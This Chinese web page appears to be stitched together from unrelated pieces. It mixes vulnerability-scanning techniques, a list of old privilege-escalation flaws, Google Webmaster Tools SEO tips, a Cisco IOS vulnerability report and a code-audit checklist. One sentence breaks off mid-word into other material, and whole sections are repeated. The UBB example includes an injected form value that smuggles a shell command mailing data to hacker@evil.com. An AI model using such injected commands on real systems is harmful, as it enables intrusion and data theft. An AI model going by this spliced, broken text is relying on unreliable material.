漏洞掃描有以下四種檢測技術(shù):
1.基于應(yīng)用的檢測技術(shù)。它采用被動的、非破壞性的辦法檢查應(yīng)用軟件包的設(shè)置,發(fā)現(xiàn)安全漏洞。
2.基于主機的檢測技術(shù)。它采用被動的、非破壞性的辦法對系統(tǒng)進行檢測。通常,它涉及到系統(tǒng)的內(nèi)核、文件的屬性、操作系統(tǒng)的補丁等。這種技術(shù)還包括口令解密、把一些簡單的口令剔除。因此,這種技術(shù)可以非常準(zhǔn)確地定位系統(tǒng)的問題,發(fā)現(xiàn)系統(tǒng)的漏洞。它的缺點是與平臺相關(guān),升級復(fù)雜。
3.基于目標(biāo)的漏洞檢測技術(shù)。它采用被動的、非破壞性的辦法檢查系統(tǒng)屬性和文件屬性,如數(shù)據(jù)庫、注冊號等。通過消息文摘算法,對文件的加密數(shù)進行檢驗。這種技術(shù)的實現(xiàn)是運行在一個閉環(huán)上,不斷地處理文件、系統(tǒng)目標(biāo)、系統(tǒng)目標(biāo)屬性,然后產(chǎn)生檢驗數(shù),把這些檢驗數(shù)同原來的檢驗數(shù)相比較。一旦發(fā)現(xiàn)改變就通知管理員。
4.基于網(wǎng)絡(luò)的檢測技術(shù)。它采用積極的、非破壞性的辦法來檢驗系統(tǒng)是否有可能被攻擊崩潰。它利用了一系列的腳本模擬對系統(tǒng)進行攻擊的行為,然后對結(jié)果進行分析。它還針對已知的網(wǎng)絡(luò)漏洞進行檢驗。網(wǎng)絡(luò)檢測技術(shù)常被用來進行穿透實驗和安全審記。這種技術(shù)可以發(fā)現(xiàn)一系列平臺的漏洞,也容易安裝。但是,它可能會影響網(wǎng)絡(luò)的性能。
網(wǎng)絡(luò)漏洞掃描
在上述四種方式當(dāng)中,網(wǎng)絡(luò)漏洞掃描最為適合我們的Web信息系統(tǒng)的風(fēng)險評估工作,其掃描原理和工作原理為:通過遠程檢測目標(biāo)主機TCP/IP不同端口的服務(wù),記錄目標(biāo)的回答。通過這種方法,可以搜集到很多目標(biāo)主機的各種信息(例如:是否能用匿名登錄,是否有可寫的FTP目錄,是否能用Telnet, ?Cl ?Cfroot,可以直接以root身份登錄到系統(tǒng)而無須提供口令。 二.本地管理員權(quán)限 攻擊者在已有一個本地賬號能夠登錄到系統(tǒng)的情況下,通過攻擊本地某些有缺陷的suid程序,競爭條件等手段,得到系統(tǒng)的管理員權(quán)限。
典型漏洞: 1、RedHat Linux的restore是個suid程序,它的執(zhí)行依靠一個中RSH的環(huán)境變量,通過設(shè)置環(huán)境變量PATH,可以使RSH變量中的可執(zhí)行程序以root身份運行,從而獲得系統(tǒng)的root權(quán)限。 2、Solaris 7的Xsun程序有suid位,它對輸入?yún)?shù)未做有效的邊界檢查,可以很容易地溢出它的緩沖區(qū),以root身份運行我們指定的代碼,從而獲得管理員權(quán)限。
3、在windows2000下,攻擊者就有機會讓網(wǎng)絡(luò)DDE(一種在不同的Windows機器上的應(yīng)用程序之間動態(tài)共享數(shù)據(jù)的技術(shù))代理在本地系統(tǒng)用戶的安全上下文中執(zhí)行其指定的代碼,從而提升權(quán)限并完全控制本地機器。 三.普通用戶訪問權(quán)限 攻擊者利用服務(wù)器的漏洞,取得系統(tǒng)的普通用戶存取權(quán)限,對UNIX類系統(tǒng)通常是shell訪問權(quán)限,對Windows系統(tǒng)通常是cmd.exe的訪問權(quán)限,能夠以一般用戶的身份執(zhí)行程序,存取文件。
攻擊者通常攻擊以非root身份運行的守護進程,有缺陷的cgi程序等手段獲得這種訪問權(quán)限。 典型漏洞: 1、UBB是個廣泛運行于各種UNIX和Windows系統(tǒng)的論壇程序,用PERL實現(xiàn),它的5.19以下版本存在輸入驗證問題,通過提交精心構(gòu)造的表單內(nèi)容,可以使UBB去執(zhí)行shell命令,因為一般的web服務(wù)器以nobody身份運行,因此可以得到一個nobody shell。
比如提交這樣的數(shù)據(jù):topic='012345.ubb mail hacker@evil.com 2、RedHat Linux 6.2帶的innd 2.2.2.3版新聞服務(wù)器,存在緩沖區(qū)溢出漏洞,通過一個精心構(gòu)造的新聞信件可以使innd服務(wù)器以news身份運行我們指定的代碼,得到一個innd權(quán)限的shell。 3、Windows IIS 4.0-5.0存在Unicode解碼漏洞,可以使攻擊者利用cmd.exe以guest組的權(quán)限在系統(tǒng)上運行程序。
相當(dāng)于取得了普通用戶的權(quán)限。 四.權(quán)限提升 攻擊者在本地通過攻擊某些有缺陷的sgid程序,把自己的權(quán)限提升到某個非root用戶的水平。
獲得管理員權(quán)限可以看做是一種特殊的權(quán)限提升,只是因為威脅的大小不同而把它獨立出來。 典型漏洞: 1、RedHat Linux 6.1帶的man程序為sgid man,它存在format bug,通過對它的溢出攻擊,可以使攻擊者得到man組的用戶權(quán)限。
2、Solaris 7的write程序為sgid tty,它存在緩沖區(qū)溢出問題,通過對它的攻擊可以攻擊者得到tty組的用戶權(quán)限。 3、WindowsNT系統(tǒng)中,攻擊者能夠使系統(tǒng)中其他用戶裝入一個”特洛化”的porfile,使其他用戶執(zhí)行攻擊者的惡意代碼,有時甚至是管理員。
愛問網(wǎng)絡(luò):
第一:robots文件檢查
整個網(wǎng)站不能收錄或某個目錄下所有頁面都不能收錄,經(jīng)常是因為robots.txt文件差錯引起的。網(wǎng)管工具抓工具權(quán)限部分顯示出Google所抓取的robots文件內(nèi)容。站長也可以在這里試驗不同的robots文件指令,然后輸入一個網(wǎng)址,測試網(wǎng)址是否可以被收錄,或是被禁止。
robots文件中的任何一個字母差錯都可能造成致命影響。有了這個工具,站長可以確保robots文件中的每一行代碼正確,不會錯誤禁止應(yīng)該被收錄的文件或目錄。
第二:首選域設(shè)置
站長可以設(shè)置Google應(yīng)該收錄帶還是不帶的網(wǎng)址版本,稱為首選域。
當(dāng)然,在Google網(wǎng)管工具設(shè)置的首選域?qū)Π俣鹊绕渌阉饕嫱耆黄鹱饔?。這只是解決Google網(wǎng)址規(guī)范化的輔助手段,不能完全依靠這個設(shè)置,正確合理的網(wǎng)站結(jié)構(gòu)才是解決問題的根本方法。站長也可以在這部分設(shè)置網(wǎng)站目標(biāo)地理區(qū)域。
第三:關(guān)鍵詞排名
在搜索查詢部分,網(wǎng)管工具列出網(wǎng)站獲得排名的關(guān)鍵詞有哪些,并且列出了搜索結(jié)果顯示次數(shù)、點擊次數(shù)、點擊率和平均排名。
網(wǎng)管工具則列出了網(wǎng)站真是排名及點擊數(shù)字。這也為SEO人員提供了搜索結(jié)果點擊分布的另一組數(shù)據(jù),可以用于搜索流量預(yù)估。不過,要注意的是,網(wǎng)管工具中列出的點擊率,很多時候與網(wǎng)站權(quán)重、知名度、頁面標(biāo)題標(biāo)簽的寫作有很大關(guān)系,并不一定符合其他關(guān)鍵詞的點擊情況。
第四:外部鏈接
Google的link:指令非常不準(zhǔn)確,基本不能用來看外部鏈接。網(wǎng)管工具中列出的外部鏈接則要準(zhǔn)確的多,還有雅虎的linkdomain:指令查外鏈也不錯。而且可以看出是全站鏈接還是只鏈?zhǔn)醉?。SEO人員可以一目了然的看到網(wǎng)站上哪些頁面最受歡迎。
第五:網(wǎng)站內(nèi)容
網(wǎng)管工具關(guān)鍵詞部分實際上列出的是Google在網(wǎng)站上抓取的最常見關(guān)鍵詞。查看這些常見關(guān)鍵詞,對頁面尤其是首頁的文案撰寫和修改有重要意義。
第六:內(nèi)部鏈接
內(nèi)部鏈接部分列出所有頁面的內(nèi)部鏈接數(shù)。站長可以從這些數(shù)據(jù)中大致看到網(wǎng)站內(nèi)部鏈接結(jié)構(gòu)是否有重大缺陷。如果全站主導(dǎo)航中出現(xiàn)的分類首頁內(nèi)部鏈接數(shù)非常低,很可能說明導(dǎo)航系統(tǒng)有問題。
內(nèi)部鏈接數(shù)的另外一個作用是反映出網(wǎng)站收錄頁面數(shù)。Google的site:指令也不太準(zhǔn)確,而且現(xiàn)在越來越不準(zhǔn)確,經(jīng)常不能反映出收錄數(shù)字。網(wǎng)管工具中內(nèi)部鏈接部分列出的首頁內(nèi)部鏈接總數(shù),大致上就相當(dāng)于Google收錄的頁面總數(shù),因為網(wǎng)站上每一個頁面都應(yīng)該有到首頁的鏈接。
第七:抓取錯誤及統(tǒng)計
抓取錯誤部分列出404錯誤(頁面不存在)、被robots文件禁止而不能收錄的頁面等。
其中404錯誤對檢查網(wǎng)站上是否存在錯誤鏈接很有用。對每個404錯誤,網(wǎng)管工具都列出了到這個網(wǎng)址的鏈接。如果到不存在頁面的鏈接是網(wǎng)站內(nèi)部發(fā)出的,說明這些鏈接頁面上的鏈接地址有錯誤。如果鏈接向不存在頁面的是其他網(wǎng)站,站長可以嘗試聯(lián)系對方更改錯誤鏈接到正確位置。
第八:HTML建議
查看Google的HTML建議是尋找網(wǎng)站上可能出現(xiàn)的復(fù)制內(nèi)容的最簡便方法。網(wǎng)管工具列出了重復(fù)的說明標(biāo)簽及標(biāo)題標(biāo)簽個數(shù)和具體頁面。標(biāo)題標(biāo)簽重復(fù),實際上說明這些頁面本身內(nèi)容重復(fù),往往是網(wǎng)站結(jié)構(gòu)造成的。要注意的是,有時候網(wǎng)管工具中列出的數(shù)據(jù)并不完整,一般來說博客上標(biāo)題標(biāo)簽重復(fù)的頁面絕不止兩頁。
第九:模擬蜘蛛抓取
站長可以輸入自己網(wǎng)站上的任何一個網(wǎng)址,網(wǎng)管工具會發(fā)出Google蜘蛛,實時抓取頁面內(nèi)容,并顯示出抓取的HTML代碼,包括服務(wù)器頭信息和頁面代碼。顯然這隊站長確認轉(zhuǎn)向設(shè)置和檢查服務(wù)器是否正確返回內(nèi)容很有幫助。另外,這個工具也可以用來檢查頁面是否被黑。有的時候hei/k放入的代碼會檢查瀏覽器類型,如果是用戶使用的普通瀏覽器訪問則返回正常內(nèi)容,如果是搜索引擎蜘蛛訪問,才返回hei/k加上去的垃圾內(nèi)容和垃圾鏈接。所以站長自己訪問頁面看不出任何問題。Google蜘蛛抓取到的卻不是站長自己看到的內(nèi)容。這個工具可以幫助站長檢查頁面是否存在安全漏洞。
第十:網(wǎng)站性能
網(wǎng)站速度現(xiàn)在越來越被重視,不僅對排名有影響,對用戶體驗也有很大的影響。
1、TCP數(shù)據(jù)包問題:在特定版本的IOS中,存在內(nèi)存泄漏漏洞,可導(dǎo)致DOS工具,美國CERT的一份安全警報如此寫道。
2、IPv6路由數(shù)據(jù)幀頭缺陷:IOS可能不能正確的處理IPv6(互聯(lián)網(wǎng)協(xié)議第六版)數(shù)據(jù)包的特定格式的路由數(shù)據(jù)頭,可能導(dǎo)致一個DOS攻擊或者運行任何惡意代碼。IPv6是一套可以讓我們在互聯(lián)網(wǎng)上獲得更多IP地址一套規(guī)范。
3、欺騙性的IP選項漏洞:這是一個IOS在處理具有特定的欺騙性的IP選項的IPv4數(shù)據(jù)包的時候存在的安全漏洞,據(jù)CERT說,它也可以導(dǎo)致DOS攻擊或運行任意惡毒代碼。
CERT表示,所有三個漏洞都可能導(dǎo)致設(shè)備重新加載它的操作系統(tǒng)。這情況下,一種間接的持續(xù)性的DOS情況就有可能發(fā)生,因為數(shù)據(jù)包已經(jīng)不能通過該設(shè)備了。
據(jù)CERT表示,由于運行IOS的設(shè)備可能要針對許多其他的網(wǎng)絡(luò)來轉(zhuǎn)發(fā)數(shù)據(jù),因此這種拒絕服務(wù)攻擊的間接影響所帶來的后果可能是 非常嚴(yán)重的。
據(jù)思科公司在其安全公告中表示,公司已經(jīng)發(fā)布了針對這些漏洞的補丁軟件。據(jù)思科公司補充道:它目前還不未得知有利用這些漏洞的攻擊出現(xiàn)。不過,據(jù)IBM公司互聯(lián)網(wǎng)安全系統(tǒng)的安全戰(zhàn)略主管奧爾曼表示,由于這些漏洞的嚴(yán)重性,用戶需要盡快安裝補丁軟件。據(jù)他表示,從他們的監(jiān)測來看,有許多黑客正在試圖利用這些漏洞。
建議使用金山清理專家或360安全衛(wèi)士,掃描電腦上的漏洞,并修復(fù)。
有以下四種檢測技術(shù):
1、基于應(yīng)用的檢測技術(shù)。
它采用被動的、非破壞性的辦法檢查應(yīng)用軟件包的設(shè)置,發(fā)現(xiàn)安全漏洞。
2、基于主機的檢測技術(shù)。
它采用被動的、非破壞性的辦法對系統(tǒng)進行檢測。通常,它涉及到系統(tǒng)的內(nèi)核、文件的屬性、操作系統(tǒng)的補丁等。這種技術(shù)還包括口令解密、把一些簡單的口令剔除。因此,這種技術(shù)可以非常準(zhǔn)確地定位系統(tǒng)的問題,發(fā)現(xiàn)系統(tǒng)的漏洞。它的缺點是與平臺相關(guān),升級復(fù)雜。
3、基于目標(biāo)的漏洞檢測技術(shù)。
它采用被動的、非破壞性的辦法檢查系統(tǒng)屬性和文件屬性,如數(shù)據(jù)庫、注冊號等。通過消息文摘算法,對文件的加密數(shù)進行檢驗。這種技術(shù)的實現(xiàn)是運行在一個閉環(huán)上,不斷地處理文件、系統(tǒng)目標(biāo)、系統(tǒng)目標(biāo)屬性,然后產(chǎn)生檢驗數(shù),把這些檢驗數(shù)同原來的檢驗數(shù)相比較。一旦發(fā)現(xiàn)改變就通知管理員。
基于目標(biāo)的漏洞檢測技術(shù)。它采用被動的、非破壞性的辦法檢查系統(tǒng)屬性和文件屬性,如數(shù)據(jù)庫、注冊號等。通過消息文摘算法,對文件的加密數(shù)進行檢驗。這種技術(shù)的實現(xiàn)是運行在一個閉環(huán)上,不斷地處理文件、系統(tǒng)目標(biāo)、系統(tǒng)目標(biāo)屬性,然后產(chǎn)生檢驗數(shù),把這些檢驗數(shù)同原來的檢驗數(shù)相比較。一旦發(fā)現(xiàn)改變就通知管理員。
4、基于網(wǎng)絡(luò)的檢測技術(shù)。
采用積極的、非破壞性的辦法來檢驗系統(tǒng)是否有可能被攻擊崩潰。它利用了一系列的腳本模擬對系統(tǒng)進行攻擊的行為,然后對結(jié)果進行分析。它還針對已知的網(wǎng)絡(luò)漏洞進行檢驗。網(wǎng)絡(luò)檢測技術(shù)常被用來進行穿透實驗和安全審計。這種技術(shù)可以發(fā)現(xiàn)一系列平臺的漏洞,也容易安裝。但是,它可能會影響網(wǎng)絡(luò)的性能。
愛問網(wǎng)絡(luò):第一:robots文件檢查整個網(wǎng)站不能收錄或某個目錄下所有頁面都不能收錄,經(jīng)常是因為robots.txt文件差錯引起的。
網(wǎng)管工具抓工具權(quán)限部分顯示出Google所抓取的robots文件內(nèi)容。站長也可以在這里試驗不同的robots文件指令,然后輸入一個網(wǎng)址,測試網(wǎng)址是否可以被收錄,或是被禁止。
robots文件中的任何一個字母差錯都可能造成致命影響。有了這個工具,站長可以確保robots文件中的每一行代碼正確,不會錯誤禁止應(yīng)該被收錄的文件或目錄。
第二:首選域設(shè)置站長可以設(shè)置Google應(yīng)該收錄帶還是不帶的網(wǎng)址版本,稱為首選域。當(dāng)然,在Google網(wǎng)管工具設(shè)置的首選域?qū)Π俣鹊绕渌阉饕嫱耆黄鹱饔谩?/p>
這只是解決Google網(wǎng)址規(guī)范化的輔助手段,不能完全依靠這個設(shè)置,正確合理的網(wǎng)站結(jié)構(gòu)才是解決問題的根本方法。站長也可以在這部分設(shè)置網(wǎng)站目標(biāo)地理區(qū)域。
第三:關(guān)鍵詞排名在搜索查詢部分,網(wǎng)管工具列出網(wǎng)站獲得排名的關(guān)鍵詞有哪些,并且列出了搜索結(jié)果顯示次數(shù)、點擊次數(shù)、點擊率和平均排名。網(wǎng)管工具則列出了網(wǎng)站真是排名及點擊數(shù)字。
這也為SEO人員提供了搜索結(jié)果點擊分布的另一組數(shù)據(jù),可以用于搜索流量預(yù)估。不過,要注意的是,網(wǎng)管工具中列出的點擊率,很多時候與網(wǎng)站權(quán)重、知名度、頁面標(biāo)題標(biāo)簽的寫作有很大關(guān)系,并不一定符合其他關(guān)鍵詞的點擊情況。
第四:外部鏈接Google的link:指令非常不準(zhǔn)確,基本不能用來看外部鏈接。網(wǎng)管工具中列出的外部鏈接則要準(zhǔn)確的多,還有雅虎的linkdomain:指令查外鏈也不錯。
而且可以看出是全站鏈接還是只鏈?zhǔn)醉?。SEO人員可以一目了然的看到網(wǎng)站上哪些頁面最受歡迎。
第五:網(wǎng)站內(nèi)容網(wǎng)管工具關(guān)鍵詞部分實際上列出的是Google在網(wǎng)站上抓取的最常見關(guān)鍵詞。查看這些常見關(guān)鍵詞,對頁面尤其是首頁的文案撰寫和修改有重要意義。
第六:內(nèi)部鏈接內(nèi)部鏈接部分列出所有頁面的內(nèi)部鏈接數(shù)。站長可以從這些數(shù)據(jù)中大致看到網(wǎng)站內(nèi)部鏈接結(jié)構(gòu)是否有重大缺陷。
如果全站主導(dǎo)航中出現(xiàn)的分類首頁內(nèi)部鏈接數(shù)非常低,很可能說明導(dǎo)航系統(tǒng)有問題。內(nèi)部鏈接數(shù)的另外一個作用是反映出網(wǎng)站收錄頁面數(shù)。
Google的site:指令也不太準(zhǔn)確,而且現(xiàn)在越來越不準(zhǔn)確,經(jīng)常不能反映出收錄數(shù)字。網(wǎng)管工具中內(nèi)部鏈接部分列出的首頁內(nèi)部鏈接總數(shù),大致上就相當(dāng)于Google收錄的頁面總數(shù),因為網(wǎng)站上每一個頁面都應(yīng)該有到首頁的鏈接。
第七:抓取錯誤及統(tǒng)計抓取錯誤部分列出404錯誤(頁面不存在)、被robots文件禁止而不能收錄的頁面等。其中404錯誤對檢查網(wǎng)站上是否存在錯誤鏈接很有用。
對每個404錯誤,網(wǎng)管工具都列出了到這個網(wǎng)址的鏈接。如果到不存在頁面的鏈接是網(wǎng)站內(nèi)部發(fā)出的,說明這些鏈接頁面上的鏈接地址有錯誤。
如果鏈接向不存在頁面的是其他網(wǎng)站,站長可以嘗試聯(lián)系對方更改錯誤鏈接到正確位置。第八:HTML建議查看Google的HTML建議是尋找網(wǎng)站上可能出現(xiàn)的復(fù)制內(nèi)容的最簡便方法。
網(wǎng)管工具列出了重復(fù)的說明標(biāo)簽及標(biāo)題標(biāo)簽個數(shù)和具體頁面。標(biāo)題標(biāo)簽重復(fù),實際上說明這些頁面本身內(nèi)容重復(fù),往往是網(wǎng)站結(jié)構(gòu)造成的。
要注意的是,有時候網(wǎng)管工具中列出的數(shù)據(jù)并不完整,一般來說博客上標(biāo)題標(biāo)簽重復(fù)的頁面絕不止兩頁。第九:模擬蜘蛛抓取站長可以輸入自己網(wǎng)站上的任何一個網(wǎng)址,網(wǎng)管工具會發(fā)出Google蜘蛛,實時抓取頁面內(nèi)容,并顯示出抓取的HTML代碼,包括服務(wù)器頭信息和頁面代碼。
顯然這隊站長確認轉(zhuǎn)向設(shè)置和檢查服務(wù)器是否正確返回內(nèi)容很有幫助。另外,這個工具也可以用來檢查頁面是否被黑。
有的時候hei/k放入的代碼會檢查瀏覽器類型,如果是用戶使用的普通瀏覽器訪問則返回正常內(nèi)容,如果是搜索引擎蜘蛛訪問,才返回hei/k加上去的垃圾內(nèi)容和垃圾鏈接。所以站長自己訪問頁面看不出任何問題。
Google蜘蛛抓取到的卻不是站長自己看到的內(nèi)容。這個工具可以幫助站長檢查頁面是否存在安全漏洞。
第十:網(wǎng)站性能網(wǎng)站速度現(xiàn)在越來越被重視,不僅對排名有影響,對用戶體驗也有很大的影響。
建立安全模型
1、熟悉軟件功能、功能實現(xiàn),配置等;
如:IIS的虛擬目錄、腳本映射;
2、根據(jù)功能,分析安全需求,建立安全模型;
IIS外掛,文件類型識別,目錄正確識別;目錄限制;
外掛的特點;權(quán)限不是在文件對象上,需要自己識別文件,所以需要識別出同一個文件的所有文件名;
3、根據(jù)安全需求,分析編程應(yīng)注意的地方,重點檢查。
IIS要對../進行檢測,連接文件的處理,識別出正確的目錄、文件名;編程接口完全按接口實現(xiàn); 1、通讀原代碼;
2、安全需求里面重點需要檢測的地方;
3、搜索容易有問題的函數(shù)調(diào)用,如strcpy、strcat、*printf、free、strncpy等;
4、常見一些編程問題;一些變量類型,如長度變量用int,注意一些函數(shù)非直接返回賦值問題等,一些邊界條件,記數(shù)從0開始還是從1開始。
5、分析緩沖區(qū)使用的代碼;
6、輸入輸出合法檢測;
7、編程接口調(diào)用;了解操作系統(tǒng)、基本文件、進程調(diào)用等的特性;
8、數(shù)據(jù)結(jié)構(gòu);
9、安全領(lǐng)域的最小原則; 1、測試;
(1)、熟悉輸入輸出;
(2)、根據(jù)需要編寫測試程序;
(3)、輸入輸出各種特殊情況測試,特殊字符、長串;
(4)、安全需求需要檢測的一些條件測試;
2、反匯編分析;
(1)、閱讀理解反匯編代碼;
(2)、安全需求檢測的代碼分析;
(3)、調(diào)用接口代碼分析;
(4)、sub esp,xxx 代碼分析緩沖;
(5)、strcpy、strcat、*printf、free、strncpy等調(diào)用分析;
(6)、輸入輸出檢測;
3、跟蹤調(diào)試;
(1)、異常的攔截分析;
(2)、一些字符串的流向,讀寫斷點; 1、分析總結(jié)各種漏洞、漏洞原因、編程問題,補丁修補方法,編程怎么避免。
2、對漏洞歸納分類,全面考慮;
聲明:本網(wǎng)站尊重并保護知識產(chǎn)權(quán),根據(jù)《信息網(wǎng)絡(luò)傳播權(quán)保護條例》,如果我們轉(zhuǎn)載的作品侵犯了您的權(quán)利,請在一個月內(nèi)通知我們,我們會及時刪除。
蜀ICP備2020033479號-4 Copyright ? 2016 學(xué)習(xí)鳥. 頁面生成時間:4.104秒